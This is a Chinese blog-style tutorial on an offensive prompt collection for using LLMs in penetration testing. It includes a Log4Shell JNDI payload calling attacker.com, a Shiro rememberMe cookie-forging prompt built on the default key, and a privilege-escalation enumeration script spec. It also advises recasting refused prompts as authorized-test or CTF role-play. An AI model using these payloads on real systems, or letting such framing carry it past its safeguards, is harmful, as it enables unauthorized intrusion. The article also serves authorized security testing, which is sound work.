1. 项目概述当AI成为你的渗透测试“副驾驶”如果你和我一样常年泡在Kali Linux里和各种工具、脚本、漏洞打交道那你肯定也经历过这样的时刻面对一个复杂的Nmap扫描结果需要快速筛选出有价值的服务或者写一个Python脚本去自动化某个繁琐的测试步骤却卡在了某个库的调用上又或者面对一个陌生的漏洞需要快速理解其原理并找到现成的利用代码。过去这些都需要我们自己去翻手册、查文档、搜Exploit-DB效率高低全凭经验和手速。但现在情况变了。AI大语言模型LLM的崛起尤其是那些具备强大代码理解和生成能力的模型如Gemini、ChatGPT、DeepSeek、Claude以及集成在IDE里的Cursor和Copilot正在悄然改变我们的工作流。它们不再仅仅是聊天机器人而是可以成为渗透测试工程师的“副驾驶”——一个能理解你的意图、帮你写脚本、分析输出、甚至提供攻击思路的智能伙伴。“Offensive-AI-Agent-Prompts”这个项目正是瞄准了这一趋势。它不是一个工具而是一个精心设计的“提示词”Prompts集合。你可以把它理解为一本针对渗透测试场景的“AI对话手册”。这本手册的核心价值在于它教会你如何用最精准的“语言”提示词与不同的AI模型进行交流从而让它们输出对渗透测试工作直接有用的内容比如生成特定的攻击载荷、解析扫描报告、编写自动化脚本等。其目标非常明确提升在Kali Linux环境下进行安全测试的效率与深度将AI从“玩具”变成真正的“生产力工具”。2. 核心思路如何让AI理解“黑客”的意图直接对AI说“帮我入侵一个系统”是无效且危险的这既违背AI的安全准则也得不到任何有价值的结果。真正的技巧在于“分解”与“场景化”。这个项目提供的提示词本质上是一套将复杂的渗透测试任务拆解成AI能够理解且愿意执行的、合法的、技术性步骤的方法论。2.1 任务合法化与角色扮演所有提示词设计的第一原则是确保任务的合法性。我们通常将场景设定在授权测试、CTF比赛、教育学习或本地实验环境。例如提示词的开头往往是“假设你是一名参与授权渗透测试的安全研究员目标环境为实验网络…” 这样的设定将行为框定在道德和安全范围内是获得AI有效回应的前提。其次是为AI赋予一个明确的“角色”。比如“你是一个经验丰富的渗透测试专家”、“你是一个Python安全脚本开发助手”或“你是一个漏洞分析专家”。角色扮演能引导AI以特定的知识库和思维方式来回答问题输出的内容会更专业、更贴近实战需求。2.2 结构化输入与约束输出AI模型尤其是代码类模型对模糊的指令处理能力较差。因此提示词必须高度结构化明确输入和输出的格式。输入结构化我们会提供具体的上下文。例如不是简单说“分析这个端口扫描结果”而是说“以下是一份Nmap对IP192.168.1.100的扫描结果粘贴结果。请以表格形式列出所有开放的端口、对应的服务及其版本号并针对每个服务简要说明在渗透测试中可能关注的常见漏洞或下一步攻击方向。”输出约束化明确要求输出的格式。是纯文本、列表、表格、JSON还是可执行的代码块例如“请生成一个用于探测目标example.com是否存在子域名接管漏洞的Python脚本。要求使用requests库从文件subdomains.txt中读取子域名列表并输出可能存在问题的子域名到results.txt。请提供完整的、可运行的代码。”2.3 分步引导与迭代优化复杂的任务需要分解。提示词会引导AI进行“思维链”推理。例如编写一个利用特定CVE的漏洞利用程序PoC提示词可能会这样设计第一步理解漏洞。“请先解释CVE-2023-12345这个漏洞的技术原理特别是其触发条件。”第二步构建请求。“根据以上原理构造一个能触发该漏洞的HTTP请求数据包模板。”第三步编写脚本。“基于这个模板编写一个Python PoC脚本接受目标URL作为参数发送攻击请求并根据响应判断漏洞是否存在。”第四步增加健壮性。“请为脚本添加异常处理和超时设置。”通过这种分步引导即使AI无法一次性生成完美代码也能通过多次对话迭代逐步接近我们想要的结果。这个项目中的许多提示词都隐含了这种分步对话的框架。3. 实战提示词解析与应用场景下面我将结合几个核心的渗透测试阶段拆解该项目中典型提示词的设计逻辑和使用方法。记住直接复制粘贴提示词可能效果不佳理解其结构并根据你的具体场景调整才是关键。3.1 信息收集阶段让AI成为你的分析员信息收集是渗透测试的基石但结果往往冗杂。AI可以帮助快速提炼信息。场景一Nmap结果快速分析原始提示词思路“分析这份Nmap扫描结果告诉我有什么值得关注的点。”优化后提示词示例角色你是一名渗透测试信息收集专家。 任务分析以下Nmap扫描结果并生成一份结构化的报告。 输入Nmap scan report for 192.168.1.10 Host is up (0.045s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.9p1 80/tcp open http Apache httpd 2.4.41 3306/tcp open mysql MySQL 5.7.33输出要求以Markdown表格形式列出开放端口、服务及版本。针对每个服务列出2-3个与之相关的、历史上有影响的CVE编号仅编号和简要描述。提出针对该目标的、下一步最应该进行的3个信息收集或漏洞扫描动作。实操心得指定版本是关键像“OpenSSH 7.9p1”这样的具体版本信息能让AI给出更精准的漏洞关联。如果Nmap扫描时使用了-sV参数效果会更好。限制输出范围要求列出“2-3个”CVE避免AI泛泛而谈或生成过于陈旧的漏洞列表。引导下一步让AI建议后续步骤可以启发你的测试思路尤其当你对某个服务不熟悉时。场景二子域名枚举与关联优化提示词用于ChatGPT/Claude我正在进行一个授权安全评估目标是example.com。我已经通过工具收集到了以下子域名列表[admin, test, dev, api, legacy].example.com。 请你扮演一个资深的安全研究员完成以下任务分类将这些子域名按照其常见功能如管理后台、开发环境、API接口、旧版应用等进行分类。风险推断针对每一类子域名推断在渗透测试中它们可能存在的安全风险例如admin站点可能面临爆破api站点可能存在未授权访问或注入。侦查建议为api.example.com这个子域名设计一个手动的、初步的侦查步骤例如检查/api/v1/docs端点测试常见的HTTP方法检查响应头信息等。3.2 漏洞利用与PoC开发阶段让AI成为你的代码助手这是AI最能直接提升效率的环节尤其是对于编写一次性使用的PoC或自动化脚本。场景三根据CVE描述编写简易PoC优化提示词用于Cursor/Copilot/Claude Code在IDE中针对一个CVE描述文档请帮我编写一个Python脚本来验证CVE-2021-44228Log4Shell漏洞。已知漏洞原理攻击者可通过构造包含${jndi:ldap://attacker.com/a}的日志信息触发Log4j2库执行JNDI查找导致远程代码执行。脚本要求接受两个参数目标URL (-u) 和用于接收回连的LDAP服务地址 (-l)。在目标URL的常见参数如u,id,q和HTTP头如User-Agent,X-Api-Version中插入Payload。发送HTTP GET和POST请求POST数据为JSON格式。输出发送的Payload和对应的请求位置便于追踪。使用argparse处理参数使用requests库发送请求并添加适当的超时和错误处理。请输出完整代码并添加简要注释。注意事项提供上下文必须将关键的漏洞原理信息提供给AI它无法凭空创造利用链。明确技术栈指定使用requests而非urllib这会影响代码风格和复杂度。安全警告此类脚本仅用于授权的测试环境。生成的代码必须经过你的审查和理解后才能使用切勿直接在生产环境或未授权目标上运行。AI可能会生成有错误或不完整的代码。场景四生成特定框架的漏洞检测载荷优化提示词用于DeepSeek/Gemini我需要一个用于检测目标Web应用是否使用存在反序列化漏洞的Apache Shiro框架版本1.2.4的检测载荷。已知利用条件Shiro使用了默认的AES加密密钥kPHbIxk5D2deZiIxcaaaA攻击者可以构造恶意的rememberMeCookie来实现命令执行。请用Java编写一个简单的程序它能够使用ysoserial工具链的思维无需直接引用生成一个执行命令whoami的CommonsCollections2 Gadget的序列化数据。使用上述默认密钥通过AES-CBC模式加密该序列化数据。将加密后的字节进行Base64编码。最终输出一个完整的、可以直接在Burp Suite的Repeater中使用的rememberMeCookie值。由于涉及恶意载荷你只需提供核心的加密和编码代码逻辑并省略Gadget生成的具体字节数组用注释// [Generated malicious serialized data]代替。重点展示AES加密和Base64编码过程。3.3 后渗透与自动化阶段让AI编写运维脚本在获得一定权限后需要快速进行内网侦察、权限维持或数据提取AI可以帮助快速生成系统命令或脚本。场景五Linux权限提升检查清单脚本优化提示词用于所有代码AI假设我已经获得了一个Linux目标Ubuntu 18.04的普通用户shell。请为我编写一个Bash脚本用于自动化收集常见的权限提升线索。脚本要求将所有输出保存到/tmp/linpeas.txt文件。检查以下内容系统信息、内核版本uname -a。SUID/GUID文件使用find命令查找具有SUID/SGID位的可执行文件并列出其中已知危险的如nmap,vim,bash,find等。可写文件与目录检查/etc/passwd,/etc/shadow,/etc/crontab等关键文件是否可写检查/etc/cron.d/,/var/spool/cron/等目录。环境变量检查PATH变量中是否存在可写目录。正在运行的进程与服务列出所有进程ps aux和网络连接netstat -tulpn。安装的软件包列出所有已安装的包dpkg -l或rpm -qa。在检查每一项时在输出中添加一个简单的[]提示符如[] Checking SUID files...。脚本应保持安静除非遇到错误否则不要向标准输出打印无关信息。实操心得指定路径要求输出到/tmp目录这是一个在多数Linux系统上可写的通用位置。聚焦重点提示词中列举了具体的检查项SUID、cron、PATH这比“检查所有提权可能”要有效得多能引导AI生成更具针对性的脚本。格式化输出要求添加[]标记使得输出结果更清晰便于人工后续分析。AI生成的脚本通常需要你根据目标环境微调如包管理器是dpkg还是rpm。4. 不同AI模型的特性与调优策略并非所有AI模型都适合所有任务。这个项目覆盖了多种模型正是因为它们各有侧重。4.1 通用对话模型 (ChatGPT, Claude, Gemini, DeepSeek)优势上下文理解能力强适合进行复杂的任务分解、原理分析、报告撰写和开放式问答。例如让它们分析一段复杂的网络流量或者解释一个新的攻击技术如SQL注入的变形。调优策略提供充足上下文尽可能多地粘贴相关文本如错误日志、代码片段、配置内容。使用“系统提示”如果支持在对话开始时设定角色和规则如“你是一个专注于网络安全的教育助手只提供用于防御和授权测试的知识。”迭代式提问不要期望一次得到完美答案。根据它的回答不断追问、修正或要求以不同格式重写。4.2 代码专用模型/插件 (Cursor, GitHub Copilot, Claude Code)优势与开发环境深度集成对代码语法、库函数极为熟悉能根据现有代码上下文进行补全、调试和生成。是编写、解释或修改渗透测试脚本的利器。调优策略利用上下文在IDE中打开相关的文档、配置文件或之前的代码文件这些都会成为Copilot或Cursor的提示。写清晰的注释在代码中输入注释来描述你想实现的功能AI很可能会自动补全代码。例如在Python文件中输入# Send a HTTP POST request with a JSON payload that contains a SQL injection test它可能会生成相应的requests.post代码。进行代码对话在Cursor中你可以直接选中一段代码然后问“如何优化这段端口扫描的代码”或“为这个函数添加异常处理”。4.3 使用通用技巧与注意事项温度Temperature设置对于需要确定性、准确性输出的任务如生成命令、代码应使用较低的温度值如0.1或0.2。对于需要创意、发散思维的任务如构思攻击路径可以适当调高。明确拒绝不当请求如果AI拒绝了你的请求通常出于安全策略不要试图对抗或“越狱”。重新构建你的提示词使其更符合“授权测试”和“教育学习”的框架。强调环境是“本地实验虚拟机”或“已授权的CTF靶场”。事实核查至关重要AI会“幻觉”即编造看似合理但错误的信息尤其是CVE编号、漏洞细节、命令参数等。它生成的任何命令、代码或漏洞信息都必须通过官方文档、手册或其他可靠来源进行二次验证。永远不要盲目相信AI的输出。组合使用最佳工作流往往是组合。先用ChatGPT进行思路梳理和方案设计然后用Cursor/Copilot来具体实现代码最后再让Gemini或DeepSeek从另一个角度审查代码或生成报告。5. 构建你自己的提示词库从使用到创造“Offensive-AI-Agent-Prompts”项目是一个极佳的起点但真正的力量在于你能根据自己的工作习惯构建个性化的提示词库。5.1 记录成功模式每次当你通过精心设计的提示词从AI那里获得了完美帮助时把这个对话特别是你的初始提示词保存下来。你可以使用笔记软件如Obsidian、Notion为它们打上标签例如#信息收集、#漏洞利用、#报告编写、#目标-ChatGPT。5.2 创建模板将那些高频、通用的提示词结构固化成模板。例如一个“代码解释与加固”模板模板代码安全审计角色安全代码审计员。 任务分析以下[语言]代码片段的安全性。 代码片段[粘贴你的代码]请指出代码中可能存在的安全漏洞如注入、硬编码密钥、不安全的反序列化等。解释每个漏洞的原理和潜在风险。提供修复建议或安全的代码写法。可选输出修复后的完整代码。5.3 持续迭代与优化AI模型在更新你的技能也在增长。定期回顾你的提示词库效果不好的提示词分析是问题描述不清还是对AI能力期望过高尝试拆解问题或增加更多约束条件。模型差异一个在ChatGPT上效果很好的提示词在Claude上可能需要微调。记录下不同模型的“偏好”。融入新知识当学习到一种新的攻击技术或工具时立即思考“如何用提示词让AI帮我快速应用这个技术”并设计新的提示词。6. 伦理边界与最后的话最后我必须强调最重要的原则能力越大责任越大。AI赋予我们前所未有的效率但所有行为必须坚守伦理与法律的底线。严格用于授权环境本文讨论的所有技术、提示词和生成的工具仅适用于你拥有完全权限的系统、明确的授权测试目标、CTF比赛或为教育目的搭建的实验室环境。理解而非盲从AI生成的内容是你思维的延伸而非替代。你必须完全理解它提供的每一条命令、每一段代码的含义。盲目执行未知代码是极其危险的。促进防御这些技巧同样适用于蓝队和安全运维人员。你可以用AI快速分析日志、编写监控脚本、理解攻击模式从而更好地构建防御。AI不会取代渗透测试工程师但善用AI的工程师无疑会走得更快、更远。“Offensive-AI-Agent-Prompts”项目提供的是一套“渔具”而非“鱼”。掌握与AI高效协作的思维模式将它内化为你的工作流的一部分你就能在这个快速变化的领域里始终拥有一个强大的智能伙伴。